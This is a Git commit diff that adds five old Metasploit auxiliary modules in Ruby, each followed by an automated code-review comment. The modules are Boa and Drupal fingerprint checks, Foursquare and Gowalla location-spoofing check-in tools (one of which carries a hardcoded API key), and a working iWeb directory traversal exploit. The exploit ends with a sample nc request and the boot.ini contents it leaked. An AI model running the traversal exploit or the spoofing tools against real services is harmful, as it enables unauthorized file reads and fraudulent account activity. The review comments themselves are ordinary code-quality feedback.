
some old modules

carnal0wnage committed Aug 24, 2011
1 parent e5fe99a commit a4a0287b038b313a1affc53cfb385bf7aa4e05f4
@@ -0,0 +1,65 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Boa Authentication Bypass Exploit',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module checks for your moms...',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.milw0rm.com/exploits/4542' ],
+ [ 'URL', 'http://www.securityfocus.com/archive/1/479434'],
+ ]
+ )
+
+end
+
+ def run
+
+
+ begin
+ res = send_request_raw({
+ 'version' => '1.1',
+ 'uri' => '/home/index.shtml',
+ 'method' => 'GET',
+ }, 10)
+
+ if (res and res.headers['Server'])
+ if res.headers['Server'] =~ /Boa/
+ print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah")
+ elsif
+ print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}")
+ end
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
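Review bot: The bare `elsif` in run has no condition, so Ruby parses the following `print_status(...)` call as the condition and the "not vuln" line prints only as a side effect; it should be a plain `else` (the Drupal Check module's run has the same construct). The positive branch reports "Attempting to change password to blah:blah" although run sends no further request, so the output overstates what happened. A Server banner containing "Boa" is only a fingerprint, and the message should say so, e.g. `print_status("#{datastore['RHOST']} reports Server: #{res.headers['Server']} (banner match only, not verified)")`. The first `rescue` clause has an empty body and the second uses `puts`, so connection failures are either silent or bypass the framework's output; `print_error(e.message)` keeps them visible. The 'Description' string is still placeholder text and should state what the module checks.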
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Drupal Check',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value. This should identify Drupal 4.6 and above. You MUST set the VHOST to be the domain name for this to work.',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ],
+ ]
+ )
+
+ register_options(
+ [
+ OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
+ OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ])
+ ], self.class)
+end
+
+ def run
+
+
+ begin
+ agent = datastore['UserAgent']
+ res = send_request_raw({
+ 'version' => '1.0',
+ 'uri' => '/',
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ 'Accept' => '*/*',
+ 'Connection' => 'Keep-Alive',
+ }
+
+ }, 10)
+
+ if (res and res.headers['Expires'])
+ if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/
+ print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}")
+ elsif
+ print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}")
+ end
+
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
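Review bot: The VHOST option is registered with a default of 'www.google.com', so a run where the operator forgets to set it sends a third party's name in the Host header and produces a meaningless result. The description already says it must be set, so register it as required with no default: `OptString.new('VHOST', [true, "The VHOST -- Must set for this module"])`. In run, `agent = datastore['UserAgent']` is assigned and never used; either pass it into the request hash as `'agent' => agent,` or delete the local if the HttpClient mixin already applies the option (not visible in this hunk). The fingerprint result is only printed; recording it through the included Report mixin would make it available after the console session ends.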
@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Foursquare Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Foursquare, be anywhere you want to be by venue id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.foursquare.com'),
+ OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France
+ OptString.new('USERNAME', [ true, 'foursquare username', 'username']),
+ OptString.new('PASSWORD', [ true, 'foursquare password', 'password']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ venid = datastore['VENUEID']
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "twitter=1\n" #add facebook=1 if you want facebook
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/v1/checkin?vid=#{venid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'Proxy-Connection' => "Keep-Alive",
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
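Review bot: The two debug `print_status` calls in run write the account credentials to the console, once base64-encoded and once decoded back to `user:pass`, so they end up in any spool or log file; the Gowalla module's run repeats the same two lines. Remove both calls and the `decode` local, which exists only to feed the second one. `print_status("#{res}")` dumps the whole response and is also reached when no response came back; `print_status("HTTP #{res.code}") if res` is enough for a status line. Nothing in the hunk turns on SSL, so the Basic Authorization header presumably travels in cleartext unless the operator enables it; that is worth confirming and defaulting to TLS.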
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Gowalla Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Gowalla, be anywhere you want to be by spot id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.gowalla.com'),
+ OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']),
+ #OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']),
+ OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ
+ OptString.new('USERNAME', [ true, 'gowalla username', 'username']),
+ OptString.new('PASSWORD', [ true, 'gowalla password', 'password']),
+ OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']),
+ OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']),
+ OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']),
+ OptString.new('COMMENT', [ true, 'Comment', 'fooooood']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ spotid = datastore['SPOTID']
+ lng = datastore['GPSLONGITUDE']
+ lat = datastore['GPSLATITUDE']
+ api = datastore['GOWALLAAPIKEY']
+ comment = datastore['COMMENT']
+
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n"
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/checkins?spot_id=#{spotid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'X-Gowalla-API-Version' => "1",
+ 'Accept' => 'application/json',
+ 'Proxy-Connection' => "Keep-Alive",
+ 'X-Gowalla-API-Key' => "#{api}"
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
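Review bot: The GOWALLAAPIKEY option ships a concrete API key as its default value, which commits a credential to the repository and makes every run share it. Register it without a default, `OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key' ])`, and if the committed value is a real key, treat it as exposed. In run, `comment`, `lng` and `lat` are interpolated into `postrequest` without encoding, so a comment containing `&` or `=` changes the form fields that are sent; `Rex::Text.uri_encode(comment)` or passing the fields through `'vars_post'` avoids that. The 'References' entries are the Foursquare ones copied over and do not describe this service.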
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'iWeb HTTP Server Directory Transversal Vulnerability',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability',
+ # some webcam shit has a similar Server Header see below for actual server header.
+ # default install path C:\Progam Files\Ashley Brown\iWeb\
+ 'Author' => 'CG' ,
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ],
+ [ 'BID', '37228' ],
+ [ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/10331' ]
+ ]
+ )
+ register_options(
+ [
+ OptString.new('FILE', [ true, "The file to view", 'boot.ini']),
+ OptString.new('TRAV', [ true, "Traversal Depth", '..%5C..%5C..%5C']),
+ ], self.class)
+ end
+
+ def run
+
+ begin
+ file = datastore['FILE']
+ trav = datastore['TRAV']
+ res = send_request_raw({
+ 'uri' => '/'+trav+file,
+ 'method' => 'GET'
+ }, 10)
+
+ if (res and res.code == 200)
+ print_status("Output Of Requested File:\n#{res.body}")
+ else
+ print_status("Received #{res.code} for #{trav}#{file}")
+ end
+
+ #rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ #rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+end
+
+# nc 172.16.10.132 80
+# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0
+
+# HTTP/1.1 200 OK
+# LastModified: 12/22/2005 3:22:59 PM
+# Server: iWeb
+# Content-Length: 210
+
+# [boot loader]
+# timeout=30
+# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+# [operating systems]
+# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect